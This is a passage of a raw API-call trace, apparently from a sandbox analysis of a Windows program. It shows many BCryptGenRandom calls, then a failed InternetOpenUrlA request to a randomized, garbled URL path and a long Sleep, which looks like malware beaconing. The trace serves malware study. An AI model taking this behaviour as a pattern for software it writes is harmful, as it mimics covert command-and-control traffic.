pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17aed, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a17aed) returned 0x0 [0257.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.731] GetProcessHeap () returned 0x440000 [0257.731] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0257.731] lstrcpyA (in: lpString1=0x473b90, lpString2="Àz¡\x03" | out: lpString1="Àz¡\x03") returned="Àz¡\x03" [0257.731] lstrcatA (in: lpString1="Àz¡\x03", lpString2="/l672ugpt8kyWaidKXzg2ike/hdcmcpeOt42ieOmmo2Y/ixojTLoysvbRp855wrum/" | out: lpString1="Àz¡\x03/l672ugpt8kyWaidKXzg2ike/hdcmcpeOt42ieOmmo2Y/ixojTLoysvbRp855wrum/") returned="Àz¡\x03/l672ugpt8kyWaidKXzg2ike/hdcmcpeOt42ieOmmo2Y/ixojTLoysvbRp855wrum/" [0257.732] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0257.732] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="Àz¡\x03/l672ugpt8kyWaidKXzg2ike/hdcmcpeOt42ieOmmo2Y/ixojTLoysvbRp855wrum/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0257.732] GetProcessHeap () returned 0x440000 [0257.732] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0257.732] GetProcessHeap () returned 0x440000 [0257.732] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17ac0 | out: hHeap=0x440000) returned 1 [0257.732] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0257.732] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0257.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0257.733] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0257.733] Sleep (dwMilliseconds=0x1ca9f) [0257.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0257.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.882] GetProcessHeap () returned 0x440000 [0257.882] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02450 [0257.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02451, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a02451) returned 0x0 [0257.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0257.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0257.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02467, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a02467) returned 0x0 [0257.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02488, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a02488) returned 0x0 [0257.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0257.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.900] 